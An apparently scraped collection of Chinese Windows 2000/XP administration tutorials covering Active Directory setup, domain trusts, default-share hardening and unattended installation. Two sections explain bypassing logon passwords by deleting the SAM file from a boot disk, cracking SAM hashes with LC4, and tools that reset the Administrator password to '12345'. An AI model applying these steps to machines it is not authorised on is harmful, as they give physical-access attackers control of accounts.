步骤8 重复第 4 步至第 7 步，直到已添加所需的全部搜索条件为止。
步骤9 单击"开始查找"。

7.6 域和域控制器的管理
§　更改域模式
    步骤1 打开 Active Directory 域和信任关系
    步骤2 右键单击用户想要管理的域的域节点，然后单击"属性"。
    步骤3 在"常规"选项卡上，单击"更改模式"，然后单击"是"。
    注意：如果已经有或将即将有 Windows NT 4.0 域控制器，请不要更改域模式。只能将模式从混合模式更改为本机模式。一旦域以本机模式运行后，就不能再改回到混合模式了
    如图 7.11。

§　创建明确域信任
    步骤1 打开 Active Directory 域和信任关系
    步骤2 在控制台树中，右键单击要管理的域的域节点，然后单击"属性"。
    步骤3 单击"信任"选项卡。
    步骤4 根据用户的需要，单击"受此域信任的域"或"信任此域的域"，然后单击"添加"。
    步骤5 如果要添加的域是 Windows 2000 域，则键入域的 DNS 全名。
    注意：密码必须是信任域和被信任域双方都接受的

§　验证信任关系
    步骤1 打开 Active Directory 域和信任关系
    步骤2 在控制台树中，用右键单击要验证的信任关系所涉及的一个域，然后单击"属性"。
    步骤3 单击"信任"选项卡。
    步骤4 在"受此域信任的域"或"信任此域的域"中，单击要验证的信任关系，然后单击"编辑"，如图 7.12。
    步骤5 单击"验证"。

§　撤消信任关系
    步骤1 打开 Active Directory 域和信任关系
    步骤2 在控制台树中，用右键单击要验证的信任关系所涉及的一个域节点，然后单击"属性"。
    步骤3 单击"信任"选项卡。
    步骤4 在"受此域信任的域"或"信任此域的域"中，单击要撤消的信任关系，然后单击"删除"。
    步骤5 对于此信任关系中涉及的其他域，重复该过程。
    注意：用户不可能撤消树林中不同域之间的默认双向可传递信任关系。但可删除明确创建的快捷信任关系。

返回


活动目录服务的基本安装和配置

《一键清理系统垃圾》

活动目录服务的基本安装和配置

    Active Directory 是用于 Windows 2000 Server 的目录服务。它存储着网络上各种对象的有关信息，并使该信息易于管理员和用户查找及使用。Active Directory 目录服务使用结构化的数据存储作为目录信息的逻辑层次结构的基础。Active Directory 的优点：信息安全性 、基于策略的管理 、可扩展性 、可伸缩性 、信息的复制 、与 DNS 集成 、与其他目录服务的互操作性、灵活的查询。
本章主要内容：
1、活动目录的基本概念及其作用
2、在安装活动目录前的目录规划
3、活动目录工具
    6.1 活动目录的概念
    6.1.1 域
    域提供了多项优点：
§　组织对象。
§　发布有关域对象的资源和信息。
§　将组策略对象应用到域可加强资源和安全性管理。
§　委派授权使用户不再需要大量的具有广泛管理权利的管理员。

要创建域，用户必须将一个或更多的运行 Windows 2000 Server 的计算机升级为域控制器。域控制器为网络用户和计算机提供 Active Directory 目录服务、存储目录数据并管理用户和域之间的交互作用，包括用户登录过程、验证和目录搜索。每个域至少必须包含一个域控制器。
    域树和域林
    活动目录中的每个域利用 DNS 域名加以标识，并且需要一个或多个域控制器。如果用户的网络需要一个以上的域，则用户可以创建多个域。共享相同的公用架构和全局目录的一个或多个域称为域林。如图 6.1 中所示，如果树林中的多个域有连续的 DNS 域名，则该结构称为域树。

如图6.2所示如果相关域树共享相同的 Active Directory 架构以及目录配置和复制信息，但不共享连续的 DNS 名称空间，则称之为域林。
    域树和域林的组合为用户提供了灵活的域命名选项。连续和非连续的 DNS 名称空间都可加入到用户的目录中。

6.1.2. 域和帐户命名
    Active Directory 域名通常是该域的完整 DNS 名称。但是，为确保向下兼容，每个域还有一个 Windows 2000 以前版本的名称，以便在运行 Windows 2000 以前版本的操作系统的计算机上使用。用户帐户
    在 Active Directory 中，每个用户帐户都有一个用户登录名、一个 Windows 2000 以前版本的用户登录名（安全帐户管理器的帐户名）和一个用户主要名称后缀。在创建用户帐户时，管理员输入其登录名并选择用户主要名称。Active Directory 建议 Windows 2000 以前版本的用户登录名使用此用户登录名的前 20 个字节。
    所谓用户主要名称是指由用户账户名称和表示用户账户所在的域的域名组成。这是登录到 Windows 2000 域的标准用法。表准格式为：user@domain.com (类似个人的电子邮件地址)。但不要在用户登录名或用户主要名称中加入 @ 号。Active Directory 在创建用户主要名称时自动添加此符号。包含多个 @ 号的用户主要名称是无效的。
    在 Active Directory 中，默认的用户主要名称后缀是域树中根域的 DNS 名。如果用户的单位使用由部门和区域组成的多层域树，则对于底层用户的域名可能很长。对于该域中的用户，默认的用户主要名称可能是 grandchild.child.root.com。该域中用户默认的登录名可能是 user@grandchild.child.root.com 。创建主要名称后缀 - "root" 使同一用户使用更简单的登录名 user@root.com 就可以登录。

6.1.3 域间信任关系
    对于 Windows 2000 计算机，通过基于 Kerberos V5 安全协议的双向、可传递信任关系启用域之间的帐户验证。
    在域树中创建域时，相邻域（父域和子域）之间自动建立信任关系。如图 6.2 中的 root.com 和 child.root.com 之间自动建立信任关系。在域林中，在树林根域和添加到树林的每个域树的根域之间自动建立信任关系。因为这些信任关系是可传递的，所以可以在域树或域林中的任何域之间进行用户和计算机的身份验证。
    如果将 Windows 2000 以前版本的 Windows 域升级为 Windows 2000 域时，Windows 2000 域将保留域和任何其他域之间现有的单向信任关系。包括 Windows 2000 以前版本的 Windows 域的所有信任关系。如果用户要安装新的 Windows 2000 域并且希望与任何 Windows 2000 以前版本的域建立信任关系，则必须创建与那些域的外部信任关系。
    所有域信任关系都只能有两个域：信任域和受信任域。域信任关系按以下特征进行描述：
§　单向
    单向信任是域 A 信任域 B 的单一信任关系。所有的单向关系都是不可传递的，并且所有的不可传递信任都是单向的。身份验证请求只能从信任域传到受信任域。Windows 2000 的域可与以下域建立单向信任：不同树林中的 Windows 2000 域 、Windows NT 4.0 域 、MIT Kerberos V5 领域。
§　双向
    Windows 2000 树林中的所有域信任都是双向可传递信任。建立新的子域时，双向可传递信任在新的子域和父域之间自动建立。

§　可传递
    Windows 2000 树林中的所有域信任都是可传递的。可传递信任始终为双向：此关系中的两个域相互信任。
    可传递信任不受信任关系中的两个域的约束。每次当用户建立新的子域时，在父域和新子域之间就隐含地（自动）建立起双向可传递信任关系。这样，可传递信任关系在域树中按其形成的方式向上流动，并在域树中的所有域之间建立起可传递信任。
    如图6.3中因为域 1 和域 2 有可传递信任关系，域 2 和域 3 有可传递信任关系，所以域 3 中的用户（在获得相应权限时）可访问域 1 中的资源。因为域 1 和域 A 具有可传递信任关系，

并且域 A 的域树中的其他域和域 A 具有可传递信任关系，所以域 B 中的用户（当授与适当权限时）可访问域 3 中的资源。

§　不可传递
    不可传递信任受信任关系中的两个域的约束，并不流向树林中的任何其他域。在大多数情况下，用户必须明确建立不可传递信任。在 Windows 2000 域和 Windows NT 域之间的所有信任关系都是不可传递的。从 Windows NT 升级至 Windows 2000 时，目前所有的 Windows NT 信任都保持不动。在混和模式环境中，所有的 Windows NT 信任都是不可传递的。不可传递信任默认为单向信任关系。
§　外部信任
    外部信任创建了与树林外部的域的信任关系。创建外部信任的优点在于使用户可以通过树林的信任路径不包含的域进行身份验证。所有的外部验证都是单向非转移的信任
§　快捷信任
    快捷信任是双向可传递的信任，使用户可以缩短复杂树林中的路径。Windows 2000 同一树林中域之间的快捷信任是明确创建的。快捷信任具有优化的性能，能缩短与 Windows 2000 安全机制有关的信任路径以便进行身份验证。在树林中的两个域树之间使用快捷信任是最有效的。

    6.1.4 站点
    站点是由一个或多个 IP 子网中的一组计算机，确保目录信息的有效交换，站点中的计算机需要很好地连接，尤其是子网内的计算机。站点和域名称空间之间没有必要的连接。站点反映网络的物理结构，而域通常反映用户单位的逻辑结构。逻辑结构和物理结构相互独立，所以网络的物理结构及其域结构之间没有必要的相关性，Active Directory 允许单个站点中有多个域，单个域中有多个站点。
    如果配置方案未组织成站点，则域和客户之间的信息交换可能非常混乱。站点能提高网络使用的效率。站点服务在以下两方面令网络操作更为有效：
§　服务请求
    当客户从域控制器请求服务时，只要相同域中的域控制器有一个可用，此请求就将会发给这个域控制器。选择与发出请求的客户连接良好的域控制器将使该请求的处理效率更高。
§　复制
    站点使目录信息以流水线的方式复制。目录架构和配置信息分布在整个树林中，而且域数据分布在域中的所有域控制器之间。通过有策略地减少复制，用户的网络拥塞也会同样减少。Active Directory 在一个站点内比在站点之间更频繁地复制目录信息。这样，连接最好的域控制器中，最可能需要特定目录信息的域控制器首先接收复制的内容。其他站点中的域控制器接收对目录所进行的更改，但不频繁，以降低网络带宽的消耗。

6.1.5 Active Directory 用户和计算机帐户
    Active Directory 用户和计算机帐户代表物理实体，诸如计算机或人。用户帐户和计算机帐户（以及组）称为安全主体。安全主体是自动分配安全标识符的目录对象。带安全标识符的对象可登录到网络并访问域资源。用户或计算机帐户用于：
§　验证用户或计算机的身份。
§　授权或拒绝访问域资源。
§　管理其他安全主体。
§　审计使用用户或计算机帐户执行的操作。
    Windows 2000 提供了可用于登录到运行 Windows 2000 的计算机的预定义用户帐户。这些预定义帐户为：
§　管理员帐户
§　来宾帐户
    预定义帐户就是允许用户登录到本地计算机并访问本地计算机上资源的默认用户帐户。设计这些帐户的主要目的是本地计算机的初始登录和配置。每个预定义帐户均有不同的权利和权限组合。管理员帐户有最广泛的权利和权限，同时来宾帐户有受限制的权利和权限。

6.1.6组策略
    组策略设置影响计算机或用户帐户并且可应用于站点、域或组织单位。它可用于配置安全选项、管理应用程序、管理桌面外观、指派脚本并将文件夹从本地计算机重新定向到网络位置。

    6.1.7集成DNS
    由于 Active Directory 与 DNS 集成而且共享相同的名称空间结构，因此注意两者之间的差异非常重要：
§　DNS 是一种名称解析服务。
    DNS 客户机向配置的 DNS 服务器发送 DNS 名称查询。DNS 服务器接收名称查询，然后通过本地存储的文件解析名称查询，或者查询其他 DNS 服务器进行名称解析。DNS 不需要 Active Directory 就能运行。
§　Active Directory 是一种目录服务

Active Directory 提供信息储存库以及让用户和应用程序访问信息的服务。Active Directory 客户使用"轻量级目录访问协议 (LDAP)"向 Active Directory 服务器发送查询。要定位 Active Directory 服务器，Active Directory 客户机将查询 DNS。Active Directory 需要 DNS 才能工作。
    即 Active Directory 用于组织资源，而 DNS 用于查找资源；只有它们共同工作才能为用户或其他请求类似信息的过程返回信息。DNS 是 Active Directory 的关键组件，如果没有 DNS，Active Directory 就无法将用户的请求解析成资源的IP地址，因此在安装和配置 Active Directory 之前，用户必须对 DNS 有深入的理解。

    6.1.8组织单位
    包含在域中的特别有用的目录对象类型就是组织单位。组织单位是可将用户、组、计算机和其他单位放入其中的 Active Directory 容器。组织单位不能包括来自其他域的对象。组织单位是可以指派组策略设置或委派管理权限的最小作用域或单位。使用组织单位，用户可在组织单位中代表逻辑层次结构的域中创建容器。这样用户就可以根据用户的组织模型管理帐户和资源的配置和使用。

6.2 安装活动目录(ADS)
    6.2.1 Active Directory 的规划
    在安装 Active Directory 之前，用户首先要对 Active Directory 的结构进行细致的规划设计，让用户和管理员在使用时更为轻松。
§　规划 DNS
    如果用户准备使用 Active Directory，则需要先规划名称空间。当 DNS 域名称空间可在 Windows 2000 中正确执行之前，需要有可用的 Active Directory 结构。所以，从 Active Directory 设计着手并用适当的 DNS 名称空间支持它。经过审阅，如果检测到任何规划中有不可预见的或不合要求的结果，则根据需要进行修改。
    在 Windows 2000 中，用 DNS 名称命名 Active Directory 域。选择 DNS 名称用于 Active Directory 域时，以单位保留在 Internet 上使用的已注册 DNS 域名后缀开始（如"root.com"），并将该名称和单位中使用的地理名称或部门名称结合起来，组成 Active Directory 域的全名。
    例如，root 的 sales 测试组可能称他们的域为"sales.child.root.com"。这种命名方法确保每个 Active Directory 域名是全球唯一的。而且，这种命名方法一旦被采用，使用现有名称作为创建其他子域的父名称以及进一步增大名称空间以供单位中的新部门使用的过程将变得非常简单。对于仅使用单个域或小型多域模式的小型企业，可以直接进行规划并按照与以前范例相似的方法操作。在规划 DNS 和 Active Directory 名称空间时，建议使用不同组而且不重叠的可分辨名称作为内部和外部 DNS 使用的基础。例如，假定单位的父域名是"example.root.com"。对于内部 DNS 名称的使用，用户可以使用诸如"internal.root.microsoft.com"的名称 对于外部 DNS 名称的使用，用户可以使用诸如"external.example.microsoft.com"的名称 保持内部和外部名称空间始终是分离的而且截然不同，这样用户可以简化某些配置的维护工作，如域名筛选器或排除列表。

§　规划用户的域结构
    最容易管理的域结构就是单域。规划时，用户应从单域开始，并且只有在单域模式不能满足用户的要求时，才增加其他的域。一个域可跨越多个站点并且包含数百万个对象。站点结构和域结构互相独立而且非常灵活。单域可跨越多个地理站点，并且单个站点可包含属于多个域的用户和计算机。如果只是反映用户公司的部门组织结构，则不必创建独立的域树。在一个域中，可以使用组织单位来实现这个目标。然后，可以指定组策略设置并将用户、组和计算机放在组织单位中。
    创建多个域的原因有：
§　部门之间不同的密码要求
§　大量的对象
§　不同的 Internet 域名
§　对复制进行更多的控制
§　分散的网络管理
§　规划组织单位结构
    可以在域中创建组织单位的层次结构。组织单位可包含用户、组、计算机、打印机、共享文件夹以及其他组织单位。组织单位是目录容器对象。它们表现为"Active Directory 用户和计算机"中的文件夹。组织单位简化了域中目录对象的视图以及这些对象的管理。可将每个组织单位的管理控制权委派给特定的人。这样，用户就可以在管理员中分配域的管理工作，以更接近指派的单位职责的方式来管理这些管理性职责工作。

通常，应该创建能反映组织单位的职能或商务结构的单位。例如，用户可以创建顶级单位，例如人事关系、设备管理和营销等部门单位。在人事关系单位中，用户可以创建其他的嵌套组织单位，例如福利和招聘单位。在招聘单位中，也可以创建另一级的嵌套单位。例如，内部招聘和外部招聘单位。总之，组织单位可使用户以一种更有意义且易于管理的方式来模拟用户实际工作的单位，而且在任何一级指派一个适当的本地权利机构作为管理员。
    每个域都可实现自己的组织单位层次结构。如果用户的企业包含多个域，则可以独立于其他域中的结构在每个域中创建组织单位的结构。
§　何时创建域控制器
    将 Windows 2000 Server 计算机升级为域控制器会创建一个新域或者向现有的域添加其他域控制器。创建域控制器可以：
§　创建网络中的第一个域。
§　在树林中创建其他的域。
§　提高网络可用性和可靠性。
§　提高站点之间的网络性能。
    要创建 Windows 2000 域，必须在该域中至少创建一个域控制器。创建域控制器也将创建该域。不可能有没有域控制器的域。如果确定用户的单位需要一个以上的域，则必须为每个附加的域至少创建一个域控制器。树林中的附加域可以是：新的子域、新域树的根。

§　规划用户的委派模式
    用户可以将权利下派给单位中最底层部门，方法是在每个域中创建组织单位树，并将部分组织单位子树的权利委派给其他用户或组。通过委派管理权利，用户不再需要那些定期登录到特定帐户的人员，这些帐户具有对整个域的管理权。尽管用户还拥有带整个域的管理授权的管理员帐户和域管理员器组，可以仍保留这些帐户以备少数高度信任的管理员偶尔使用。
最后在规划 Active Directory 结构时，除了需要认真考虑以上各项外，用户还要注意以下几点：
1．使用的域越少越好，因为在 Windows 2000 中已经大大扩展了单个域的容量。
2．限制组织单位的层次，在 Active Directory 搜索事物的层次越深则运行效率越低
3．限制组织单位中的对象个数，这样便于高效的查找特定资源
4．用户可以将管理权限分配到组织单位级，这样提高了管理效率，降低了管理员的负荷。

6.2.2 安装 Active Directory
    运行 Active Directory 安装向导将 Windows 2000 Server 计算机升级为域控制器会创建一个新域或者向现有的域添加其他域控制器。创建域控制器可以：
§　创建网络中的第一个域。
§　在树林中创建其他的域。
§　提高网络可用性和可靠性。
§　提高站点之间的网络性能。
    要创建 Windows 2000 域，必须在该域中至少创建一个域控制器。创建域控制器也将创建该域。不可能有没有域控制器的域。如果确定用户的单位需要一个以上的域，则必须为每个附加的域至少创建一个域控制器。树林中的附加域可以是：新的子域、新域树的根。

在安装 Active Directory 前首先确定DNS服务正常工作，下面用户来安装根域为 nt2000.com 的域中第一台域控制器。
    步骤1 利用配置服务器启动位于 %Systemroot%\system32 中的 Active Directory 安装向导程序 DCPromo.exe。
    如图 6.4，单击"下一步"
    步骤2 由于用户所建立的是域中的第一台域控制器所以选择"新域的域控制器" 单击"下一步"

步骤3 选择"创建一个新域的域目录树" ,单击"下一步"
    步骤4 选择"创建一个新域的域目录林", 单击"下一步"
    步骤5 在"新域的 DNS 全名"中输入要创建得域名，nt2000.com
    如图 6.5,单击"下一步"

步骤6 安装向导自动将域控制器的 NetBIOS 名设置为 "nt2000" ,单击"下一步"
    步骤7 显示数据库、目录文件 及Sysvol 文件的保存位置，一般不必作修改。单击"下一步"
    步骤8 配置 DNS 服务,单击"下一步",（如果在安装 Active Directory 之前未配置 DNS 服务器可以在此让安装向导配置 DNS ，推荐使用这种方法。）
    步骤9 为用户和组选择默认权限，考虑到现在大多数单位中仍然需要使用 Windows 2000 的以前版本，所以选择"与 Windows 2000 服务器之前版本相兼容的权限"
    如图 6.6,单击"下一步"

步骤10 输入以目录恢复模式下的管理员密码,单击"下一步"
    步骤11 安装向导显示摘要信息,单击"下一步"开始安装如图6.7
    步骤12 安装完成之后，重新启动计算机。
    检验安装结果
    在安装完成后，可以通过以下方法检验 Active Directory 安装正确，在安装过程中一项最重要的工作是在 DNS 数据库中添加服务记录( SRV 记录)。
1．检查 DNS 文件的SRV记录
    用文本编辑器打开 %systemroot%/system32/config/ 中的 Netlogon.dns 文件，察看 LDAP 服务记录，在本例中为

_ldap._tcp.nt2000.com. 600 IN SRV 0 100 389 n2k_server.nt2000.com.
2.验证 SRV 记录在 NSLOOKUP 命令工具中运行正常
    步骤1 在命令提示行下，输入 NSLOOKUP
    步骤2 输入 set type=srv
    步骤3 输入 _ldap._tcp.nt2000.com
    如果返回了服务器名和 IP 地址，说明 SRV 记录工作正常

6.2.3 安装第二台域控制器
    在安装完第一台域控制器后其域名为 nt2000.com ,在上例中该服务器用于总公司，如果由于公司扩展的需要为其新建的工厂建立自己的域名和域控制器，则用户将工厂的域名定义为 man.nt2000.com ，由于此域名与 nt2000.com 是连续的域名，所以他们组成了一个目录树，今后随着工厂的发展用户还可以在这个目录树下继续逐级添加子域（如：accounting.man.nt2000.com），如果需要添加的域名与该目录树不连续（如：nt3000.com）则用户就需要建立一个新的目录树，这样由多个目录树组成了域目录林。
    在安装第二台域控制器之前，首先检验它的IP设置和DNS设置，以保证可以访问域控制器（n2k_server.nt2000.com）。
    步骤1 利用配置服务器启动位于 %Systemroot%\system32 中的 Active Directory 安装向导程序 DCPromo.exe 。如图6.4，单击"下一步"
    步骤2 由于用户所建立的是域中的一台域控制器所以选择"新域的域控制器" 单击"下一步"
    步骤3 选择"在现有域目录树中创建一个新的子域" ,单击"下一步"
    步骤4 在"网络凭据"对话框中输入上一级域的域名及具有管理员权限的用户名和密码, 单击"下一步"
    步骤5 在"子域安装"对话框中输入父域域名（nt2000.com）和子域域名（man）,在下方的子域完整域名中会自动显示 man.nt2000.com,单击"下一步"
    步骤6 安装向导自动将域控制器的 NetBIOS 名设置为"man",用户也可以进行修改 ,单击"下一步"
    步骤7 显示数据库、目录文件及 Sysvol 文件的保存位置，一般不必作修改。单击"下一步"

步骤8 为用户和组选择默认权限，考虑到现在大多数单位中仍然需要使用 Windows 2000 的以前版本，所以选择"与 Windows 2000 服务器之前版本相兼容的权限",单击"下一步"
    步骤9 单击"下一步"开始安装，在重新启动后，在 n2k_server.nt2000.com 的" Active Directory 域和信任关系"中将显示新建的子域 man.nt2000.com 如图6.8

6.3 活动目录工具
    在安装完毕后，在管理工具中提供了三个工具

§　Active Directory 用户和计算机
如图 6.9

§　Active Directory 域和信任关系
如图 6.10

§　Active Directory 站点和服务
如图 6.11

系统还提供了 Active DirectorySchema 和 ADSI 主要用于 Active Direttory 开发的工具。Active Directory 域和信任关系、Active Directory 站点和服务工具主要用于管理多个服务器或多个域之间的关系，这不是本书的重点；Active Directory 用户和计算机工具是配置互动目录最常用的工具，在后续章节中用户将详细介绍它的使用方法。
    当用户登陆到网络上，用户可以看到活动目录，
如图 6.12

返回


解决NTFS下Win2000密码丢失

《一键清理系统垃圾》

解决NTFS下Win2000密码丢失

    第一步，网站下载NTFSDOS Professional软件(下载地址：http://www.winternals.com)，下载后进行安装，安装后执行NTFSDOS Professional Boot Disk Wizard程序，根据向导，会提示依次插入两张软盘，其实能用到的就是第一张。

    第二步，用Win98软盘或光盘启动盘启动机器到DOS状态，然后插入已经做好的NTFSDOS软盘第一张，执行Ntfspro.exe文件，它会开始自动分析当前硬盘分区表，如果有NTFS分区信息，然后就会依次列出每个NTFS分区的盘符(如果此时有机器的报警声响，请不要惊慌，因为此时可能是在你的某个NTFS分区的根目录有中文的目录存在，在DOS中它可能被认为是非法目录)。

    第三步，也就是清除Win2000用户口令。在DOS状态进入WinNT所在的盘符，一般为C区。进入%root%\system32\config目录(%root%指WinNT所在的分区路径)，手动删除SAM文件，这样就可以把Win2000所有用户口令清除了。

    第四步，只需热启动机器，回车就可以正常进入Win2000了。


禁用Windows2000/XP系统默认共享

《一键清理系统垃圾》

禁用Windows2000/XP系统默认共享

我们可以用Net Share命令来删除，但是机器重启后这个共享会自动出现，这时，我们可以修改注册表。
IPC$、Admin$和C$、D$都不同，在注册表的修改是不同的。你所改的只是禁止了C$、D$。而没有禁止IPC$。
禁止C$、D$管理共享
对于服务器而言：
修改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
Name：AutoShareServer
Type：DWORD
Value：0
对于工作站而言：
修改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
Name：AutoShareWks
Type：DWORD
Value：0
修改注册表后需要重启Server服务或重新启动机器。
注：这些键值在默认情况下在主机上是不存在的，需要自己手动添加。

禁止ADMIN$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
Name：AutoShareWks
Type：REG_DWORD
Value：0x0

限制IPC$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
Name：restrictanonymous
Type：REG_DWORD
Value：0x0(缺省)
0x1 匿名用户无法列举本机用户列表
0x2 匿名用户无法连接本机IPC$共享
说明:不建议使用2，否则可能会造成你的一些服务无法启动，如SQL Server


快速恢复Windows 2000/XP遗忘的管理员密码

《一键清理系统垃圾》

快速恢复Windows 2000/XP遗忘的管理员密码

  一、删除SAM文件，清除Administrator账号密码

    Windows 2000所在的Winnt\System32\Config目录下有个SAM文件(即账号密码数据库文件)，它保存了Windows 2000中所有的用户名和密码。当你登录的时候，系统就会把你键入的用户名和密码，与SAM文件中的加密数据进行校对，如果两者完全符合，则会顺利进入系统，否则将无法登录，因此我们可以使用删除SAM文件的方法来恢复管理员密码。

    删除SAM文件后重新启动，此时管理员Administrator账号已经没有密码了，这时你可以用Administrator账户登录系统，不用输入任何密码，进入系统后再重新设置你的管理员账户密码即可。

    二、从SAM文件中找密码

    这里需要的工具是LC4，运行LC4，打开并新建一个任务，然后依次点击“IMPORT→Import from SAM file”，打开已待破解的SAM文件，此时LC4会自动分析此文件，并显示出文件中的用户名；之后点击“Session→Begin Audit”，即可开始破解密码。如果密码不是很复杂的话，很短的时间内就会得到结果。

    不过，如果密码比较复杂的话，需要时间会很长，这时我们就需要用下面的方法了。

    三、用密码重设盘设新密码

    在没有使用“欢迎屏幕”登录方式的情况下登录到Windows XP后，按下“Ctrl + Alt + Del”组合键，出现“Windows 安全”窗口，点击选项中“更改密码”按钮，出现更改密码窗口。这个窗口中，将当前用户的密码备份，点击左下角“备份”按钮，激活“忘记密码向导”，按照提示创建密码重设盘。

    如果在Windows XP的登录窗口输入了错误的密码，就会弹出“登录失败”窗口，如果你的确想不起来自己的密码是什么时，可点击“重设”按钮，启动密码重设向导，通过刚才所创建的密码重设盘，重新设定密码，登录Windows XP。

    四、使用软件修改密码

    Windows Key 5.0和Windows XP/2000/NT Key这两款软件可以自动把Administrator密码修改为12345，重启系统后用此账号登录，然后在“控制面板”用户中，再重新修改管理员密码即可。

    软件名：Windows Key 5.0

    使用方法：运行之后会生成3个文件：txtsetup.oem、winkey.sys和winkey.inf，把它们拷贝到一张软盘中，制作成一张Windows Key盘。然后使用Windows XP安装光盘启动电脑，启动过程中按F6键让系统安装第三方的驱动程序。此时，放入Windows Key软盘就会自动跳到WindowsKey的界面，这时它会强行把Administrator的密码换成“12345”。

    软件名：Windows XP/2000/NT Key

    使用方法：用它制作一张驱动软盘；然后用安装光盘启动电脑，启动过程中按“S”，插入该驱动软盘，系统管理员账号administrator的密码就会被改为12345。


利用Windows 2000快速建立小型网络

《一键清理系统垃圾》

利用Windows 2000快速建立小型网络

    在商业竞争日趋激烈的今天，中小企业如何应对多变的市场环境，使信息的采集、处理更加便捷，信息沟通更加流畅，采用IT技术就成为大多数企业的选择。我们公司是一家小型广告公司，每天都要为客户进行广告的策划、设计并负责与媒体联系，这些工作当然离不开计算机的支持，特别是网络的支持。为此我们公司建立了一个小型星型拓扑结构的以太网络，在网络操作系统的选择上当然是采用微软的最新产品Windows 2000，通过这次部署Windows 2000，使我们深切感受到Windows 2000在网络部署上的方便性，下面把我们的部署过程介绍给大家，使大家进一步了解其过程有多么快捷。

    首先当然是必须建立物理网络，我们采用星型拓扑结构连接了八台设备构成以太网，只要通过简单的物理连接就可以把网络建立起来。重要的是如何部署Windows 2000操作系统，我们采用了无用户参与的或脚本化安装，这种方法需要建立网络分发共享和回答文件，以在每台机器上自动运行安装程序。有些人可能使用过这种方法部署WinNT，在Windows 2000中这种方法已经作了显著的改进，特别是在网络配置和设备安装方面。例如，如果您想在Windows 2000中安装额外的设备驱动程序，在做无用户参与部署时，只需把驱动程序放到指定目录，安装程序会自动使用它。在进行网络配置时会做一些变动，如果您想很方便地配置网卡，可以直接使用unattend文本文件。另一个较大的改进是安装程序管理器，它是一个新的安装管理工具，可以建立网络分发共享和回答文件。

    使用无用户参与安装方法部署Windows 2000专业版的第一步是：让一台网络计算机充当分发服务器，让它存放所有Windows 2000专业版安装文件，它必须能让所有想安装Windows 2000专业版的计算机通过网络访问到。下一步要在分发服务器上运行安装程序管理工具，运行后系统会提示一系列向导屏幕信息：例如安装时的用户交互级别，每台目的机器的计算机名、管理员口令，目的机器是在工作组中还是在域中，在目的机器中是否安装网络打印机，Windows 2000专业版安装分发文件夹的位置，回答文件的名称和位置（缺省文件名为unattend.txt）。最后把所有源文件复制到分发文件夹，同时确保Windows 2000产品CD可以使用，当安装程序管理器运行完以后,就建立了分发文件夹，它包含所有必要的Windows 2000专业版安装文件和回答文件,文件名为unattend.txt，该文件会回答Windows 2000专业版安装程序提出的问题。

    下一步是在目标机器安装Windows 2000专业版，由于我们有些机器已经安装了以前的Windows或Windows NT版本，只要用它们连接到分发文件夹并运行winnt32.exe即可；如果要重新安装一份新拷贝，只要用网络引导软盘启动计算机，连接到分发文件夹并运行winnt.exe，再次指定回答文件的名称。通过在每台客户机重复上述过程就快速完成了系统部署操作。

    由于在我们的网络环境中计算机的硬件和软件配置完全不同，我们采用无用户参与的安装，使安装程序在每台计算机上分别运行，这样使部署操作具有最大的灵活性。

返回


目录服务

《一键清理系统垃圾》

目录服务

Active Directory提供集中组织、管理和控制对网络资源访问的方法。

1.Active Directory命名规范：

a Distinguished Name: DC=com,DC=contoso,CN=Users,CN=James Smith 表示用户对象James Smith在contoso.com域中
b Relative Distinguished Name: 是Distinguished Name的一部分
c User Principal Name: 由用户登录名和域名组成，如 JamesS@contoso.com
d GUID: Active Directory中的每一个对象都有唯一的GUID

2.Active Directory的逻辑结构：

a Domain：安全边界，每个域有自己的安全策略 Active Directory复制的 单元 有Mixed Mode和Native Mode（域控制器都是Win2000）
b Organizational Units：用于存放对象的容器，如用户账号、组、计算机等 可容纳对象和其他OU 可按地理或逻辑需要创建OU
c Tree：共享连续的命名空间,管理员可在树中任何一个域进行管理
d Forest：一组树构成了森林，但不共享连续的命名空间 Trust
e Relationship：支持单向、非传递性的和双向、传递性的信任关系 双向信任在Win2000中是缺省的

3.Active Directory的物理结构：

a Site：一个或多个通过高速连接的IP子网构成了Site Site允许配置目录访问和复制的拓扑结构 创建Site是为了优化复制流量和允许用户更好地访问域控制器
b Domain Controller： Active Directory使用多主复制模型,不存在主域控制器， 域控制器之间相互复制目录数据
c Global Catalog： 包含Active Directory中对象属性的子集，最常访问的属性 被存放在Global Catalog中

4.Active Directory复制组件:

a Knowledge Consistency Checker（KCC）： Active Directory通过KCC自动配置域控制器之间的复制连接 KCC是域控制器的内建进程，它创建连接以保持复制拓扑的完整性
b Server Object： 当创建域控制器时，会自动创建一个Server Object，它和域控制器 的Computer Object不一样，尽管都指向同一个计算机。Server Object 主要用于域控制器的复制和站点管理。 Server Object是Site Object的子对象。Site Object应包含域控制 器所在的子网。
c NTDS Setting Object： 包含Connection Object对象的容器
d Connection Object： 两个Server Object之间复制的一个单向连接 可由KCC自动创建或管理员手动创建

5.在一个站点内复制：

当域控制器的对象发生了变化，产生一个Change notification进程，缺省 等5分钟后发送消息给复制伙伴。而且复制流量是未压缩的。复制采用的协议 是RPC over IP（remote procedure call）---提供高速、一致的连接性。

6.在多个站点之间复制：

通过schedule、interval等值来进行配置。例如，schedule决定什么时候开始 复制，而interval决定多长时间间隔域控制器检查改变是否发生。而且，复制 流量是被压缩的，压缩比大约为10%-15% 。复制采用的协议是RPC over IP或 SMTP，但SMTP只能用于不同域的域控制器之间的复制，大多数情况下，采用RPC over IP。

7.连接多个Sites：

需要额外的对象---Site links和Site link bridges
a Site Links---表示两个Site之间的连接的对象。缺省时创建DefaultIPSiteLink。 可以为Site link指定一些Value：

b Cost---反映连接的带宽。值从1到32767。值越大表示连接速度 越满，缺省时为100。另外，应保证Cost的选择是成比例的。
c Interval---复制的时间间隔。
d Schedule---定义什么时候可以复制，缺省时，所用时间段均可。

e Site Link Bridges---表示一组采用相同复制协议的Site Links。缺省时，所有 采用相同复制协议的Site Links属于某个Site Link Bridge， 而且在完全路由的网络中，不需手工配置。

返回


配置远程安装服务和设置用户配置文件

《一键清理系统垃圾》

配置远程安装服务和设置用户配置文件

  本章主要内容：
1、远程安装服务的基本概念
2、远程安装服务的规划
3、远程安装服务的安装
4、远程安装服务的设置
5、客户机的安装配置
6、用户配置文件的类型
7、创建及管理配置文件

    1、 远程安装服务的基本概念
